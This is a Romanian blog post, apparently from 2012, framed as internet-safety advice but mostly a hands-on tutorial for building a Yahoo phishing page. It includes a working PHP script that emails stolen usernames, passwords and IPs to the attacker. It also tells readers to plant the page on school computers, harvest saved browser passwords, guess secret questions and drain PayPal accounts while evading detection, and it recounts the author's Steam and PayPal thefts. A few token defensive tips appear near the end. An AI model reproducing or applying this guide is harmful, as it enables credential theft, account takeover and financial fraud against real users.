Invata despre securitatea pe Internet. Sfaturi utile



   O sa detaliez cea mai cretina, dar functionala, metoda de aflare a unei parole si, bineinteles, cum sa te feresti de ea. De fapt tutorialul asta este facut in scop informativ, iar informatiile din el nu trebuie folosite pentru a face rau altei persoane.


Bun venit pe i-Learn2.
In caz ca acest tutorial a fost preluat de catre alt site, originea articolului il puteti gasi pe acest site: http://i-learn2.blogspot.com/ 

Scam page
Cu siguranta ati auzit de asa ceva. Basically e o pagina asemanatoare chiar identica care iti trimite tie userul si parola. Asta e cea mai simpla forma de scam page. Care e mai bo$$ face site-uri intregi de la banci, de la magazine online, de la te miri ce si ajunge la stiri ca mare haker, dar si la Jilava...

Deci ca sa nu ajungeti prin parnaie o sa ma rezum doar la chestii simple care nu implica "mutarea" baniilor de pe un cont pe altul (desi daca prindeti si unu care are bani pe paypal sau cardul asociat cu contul de paypal puteti lua putin din ei). O sa mai scriu si despre cum sa faceti scam page-ul asta "cat mai" eficient si nedetectabil cu putinta.

Sa incepem...
Ziceam mai sus ca scam page = pagina identica care trimite user si pass tie.
Pentru tutorialul asta o sa folosesc pagina de log-are in mail la yahoo: https://login.yahoo....intl=us&.src=ym

Prima si prima data trebuie copy paste codului sursa. Ca sa faceti acest lucru va duceti sus la View -> Page Source (sau ctrl+u). Asa este in Firefox, in alte browsere este cam la fel, poate difera putin denumirile. De exemplu in IE6 este View -> Source.
Dupa ce se deschide fereastra cu codul sursa trebuie selectat tot (eu unu prefer metoda ctrl+a, mai puteti da mouse 2 -> select all, etc.).
Acum trebuie sa puneti codul sursa intr-un fisier .txt sau .html. Puteti folosi Wardpad, Dreamweaver sau Notepad++ (asta e editor de mai multe chestii, nu e clasicul Notepad din Win), etc. De tinut minte ca daca folositi un editor de .txt trebuie sa ii schimbati extensia in .html ca sa il puteti folosi.
Deci avem toata pagina de login de la yahoo intr-un fisier.
Cautati

<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="" name="login_form" onsubmit="return hash2(this)">

Inlocuiti https://... de la action cu mail.php. O sa rezulte
<form method="post" action="mail.php" autocomplete="" name="login_form" onsubmit="return hash2(this)">

Dupa ce ati facut asta copiati textul de mai jos intr-un fisier .txt si salvati-l cu extensia .php.
<?php
$to = "mailultau@gmail.com";
$subject = "Parola de la un ratat";
$headers = "From: webmaster@siteultau.ro";
$message = "User: ".$_POST['login']."\n"."Password: ".$_POST['passwd']."\n"."IP: ".$_SERVER['REMOTE_ADDR'];
mail($to, $subject, $message, $headers);
header("Location: https://login.yahoo.com/config/login?");
?>

$to = pe ce mail sa trimita userul si parola. E bine sa folositi gmail nu yahoo.
$subject = subiectul, titlul daca vreti de la mail. Se poate modifica.
$headers = "From: ..." arata cine a trimis mailul. Se poate modifica.
$message = asta nu se modifica. O sa trimita pe mailul de la $to userul, parola si ipul userului. Am pus si ipul ca sa va dati seama cand cineva trimite la misto mailuri.
header("location: ..." il trimite pe nab pe adresa reala de la yahoo. Nu il si logheaza pe mail. Pentru asta sunt niste metode mai speciale pe care nu le dezvalui.

Dupa toate astea trebuie sa urci cele 2 fisiere pe un host. Nu cred ca am zis, dar copy paste de la yahoo se salveaza cu index.html.
De preferat ar fi un host fara reclame si cu functia mail() activa. Eu am facut teste pe http://www.linkmania...owtopic=382569. E foarte bun si il recomand.
Cam atat despre scam page mai jos o sa scriu cum sa folositi eficient aceasta metoda, cum sa o deghizati si ce puteti face cu un mail si o parola, iar la final de tot cum sa nu cadeti voi in aceste capcane.

Cateva idei despre cum sa folositi scriptul eficient
Cel mai simplu de folosit este in scoli/licee. Va duceti la cat mai multe calculatoare si setati home page-ul de la browser siteul unde aveti scriptul. Din zecile de elevi care o sa treaca pe la acele calculatoare cel putin 1 o sa se logheze pe mail.
Daca aveti un site maricel va puteti folosi de avantajul asta bagand "reclame" pop-up cu mesaje de genul "Poti castiga nu stiu ce, da click aici si logheazate", daca mai pui si un reCAPTCHA creste increderea userilor. Mai mult daca aveti un forum maricel cand cineva isi face cont, email-ul si parola se pastreaza in baza de date. Parola se va pastra criptata si nu se va putea decripta, dar puteti folosi un script asemanator cara sa va trimita parola in format necriptat, dar asta e alta discutie. Sunt metode mai inteligente dar va las pe voi sa va ganditi la ele.

De ce am facut demostratia cu un scam page yahoo?
Pentru ca daca ai mailul cuiva poti, pe urma, descoperi toate conturile lui, de steam, papypal, tracker, etc. si vei putea sa recuperezi parolele fara efort. Dar puteti face astfel de scam page-uri la orice site.

Ca sa nu cadeti voi in astfel de capcane tineti minte cateva lucruri
1. Nu va log-ati decat pe siteul oficial/original. Daca va pune careva sa va log-ati pe nu stiu ce site ca sa primiti un joc gratis pe steam sigur e scam.
2. Din experienta va spun ca cei mai multi au aceleasi parole la toate conturile. Ideal ar fi sa ai cate o parola la fiecare cont si sa nu se asemene intre ele. Dar asta e idealul. Obligatoriu parola de la email trebuie sa fie diferita de toate celelalte parole.

Bonus
Un mic "exploit" pe care il foloseam cand eram in liceu, destul de util :).
Nu stiu cati dintre voi v-ati gandit sa cautati parolele in browserele in PC-urile de la scoala. O sa fiti surprinsi cate parole gasiti. De multe ori ajunge o parola de la un cont gen travian (jocuri care se joaca de pe PC-urile de la scoli) ca sa poti sparge restul conturilor.

Pregatirea PC-ului (a browserului)
De multe ori nu este nevoie sa pregatesti nimic, dar pentru un efect maxim trebuie macar verificat.
O sa ma refer la Firefox, dar ar trebui sa fie asemanator la celelalte browsere.
Deschideti tabul Tools -> Options...
Mergeti la Security. Aici sa aveti bifat Remember passwords for sites si debifat Use a master password. Apasati pe Exceptions... si daca este vreun site acolo stergeti-l. Ca sa vedeti parolele salvate apasati pe Saved Passwords...

Cateva vorbe de incheiere
Dupa ce aflati o parola nu fiti distructivi. Nu va dati mare ca ati spart contul de hi5, facebook al unei pitzipoance.
Nu va ajuta cu nimic un cont de email sau conturi de la jocuri gen travian. Uitati-va doar dupa conturi cu adevarat folositoare, cum ar fi cele de steam (care au si jocuri pe ele), de paypal, de trackere (la astea sa nu le schimbati parola dupa ce o gasesti, foloseste-le doar ca sa downloadezi, dar lasa-l pe nab sa faca ratia). Cu alte cuvinte nu schimba parola la conturi care nu te intereseaza nu ii fura conturile care tie nu iti trebuie. Conturile de yahoo poti sa le folosesti ca sa iti faci reclama la site, la ce mai vrei tu, dar nu ii schimba parola ca n-ai ce face cu contu lui de mess. Daca il folosesti doar ca sa iti faci reclama, propietarul nu o sa isi dea seama ca i-a spart careva parola. O sa zica ca are un virus care face automat reclama in mess. Atentie la conturile de Gmail. Astea pastreaza IP-ul. Daca intrati pe un cont de Gmail imediat sa ii schimbati parola ca sa nu poata intra propietarul pe el si sa va vada IP-ul (multi dintre voi au IP dinamic, deci n-ar fi o problema asa mare) si dupa ce nu mai folositi contul de Gmail stergeti-l intrand aici: https://www.google.c...ts/EditServices

Tineti minte ca ce am scris aici nu trebuie sa folositi decat ca sa va protejati de astfel de manevre. Nu am intrat in metode mai complicate pentru ca as lua suspend pe forum si nici n-ar mai fi phun sa vezi toti hackerii utilizandu-ti metodele. Poate o sa postez si metodele mele actuale de descoperit parole dupa ce o sa definitivez o metoda mai buna.

Inca 3 vorbe despre securitate
1. Raspunsurile la intrebarile secrete nu trebuie sa aiba legatura cu intrebarea. Ii sparsesem lu unu contul doar pentru ca avea in id cuvantul steaua, iar intrebarile secrete erau echipa favorita (oare care o fi =))) si jucatorul favorit (era lacatus). La yahoo nu conteaza daca ai scris raspunsul cu majuscule, nu e case sensitive, deci e si mai simplu de spart.
2. Sparsesem un cont de paypal si transferasem 50 de euro, dar tranzactia a fost intoarsa. Sa va spun ce am invatat din asta.
Daca gasesti un id si o parola asigura-te ca omul nu mai e pe net cand ii "controlezi" contul. Eu nu m-am asigurat. Si cand am facut tranzactia pe paypal a primit un email si s-a prins. Vedeti ca in general userii de paypal nu au bani pe contul de paypal, vedeti daca au carte de credit. O sa se transfere banii de acolo. Si, bineinteles, nu va transferati de pe contul lui direct pe contul vostru bun. Si mereu folositi proxy (o sa fac un scurt tutorial si despre asa ceva) cand intrati pe alte conturi. De sigur daca aveti IP dinamic nu cred ca e musai.
3. NU va salvati parolele, conturile pe alte calculatoare. Parola sa nu contina data nasterii, nici raspunsul la intrebare sa nu contina asa ceva. Mai pe scurt contul (parola si alte elemente de siguranta) nu trebuie sa contina nimic personal. Oricum treaba asta e relativa si se pot sparge conturi si daca au o parola de genul *ux@mO10 care sa nu aiba legatura cu nimic. Cu ajutorul keyloggerelor, deci aveti grija ce luati de pe net.

Ar mai fi multe de zis despre securitate, dar mai experimentati si voi, mai citit.

ps: Cand spargeti conturi de steam incercati sa spargeti de la romani, unguri, bulgari, astia de pe langa.
Sparsesem 3 conturi de steam de la rusi. Unu avea CSS, dar jocul era blocat pe regiune si nu il puteam folosi in RO, asa ca i-am lasat contul. Altul cu Left 4 Dead 2, tot asa era blocat si mai sparsesem un cont de steam care avea Assasin's Creeed 2 (aveam o comanda de Assasin's Creed 2) si multe alte jocuri dar ghinionul a facut ca ala de avea contul sa poata demonstra ca e al lui. Si asa l-a recuperat. Deci cand spargeti conturi de steam exista o posibilitate ca persoana sa isi poata recupera contul daca are dovada ca acel cont este al lui (cd key de la jocuri, dovada platii).

Cu speranta ca am scris tot si n-am omis nimic va spun bafta.
Btw eu unu nu (mai) sparg conturi. Niciodata sa nu spargeti conturi de la prieteni.

Bun venit pe i-Learn2.
In caz ca acest tutorial a fost preluat de catre alt site, originea articolului il puteti gasi pe acest site: http://i-learn2.blogspot.com/  


Responses

0 Respones to "Invata despre securitatea pe Internet. Sfaturi utile"

Trimiteți un comentariu

 
Return to top of page Copyright © 2012 | i-Learn2 Theme Converted into Blogger Template by Dominiq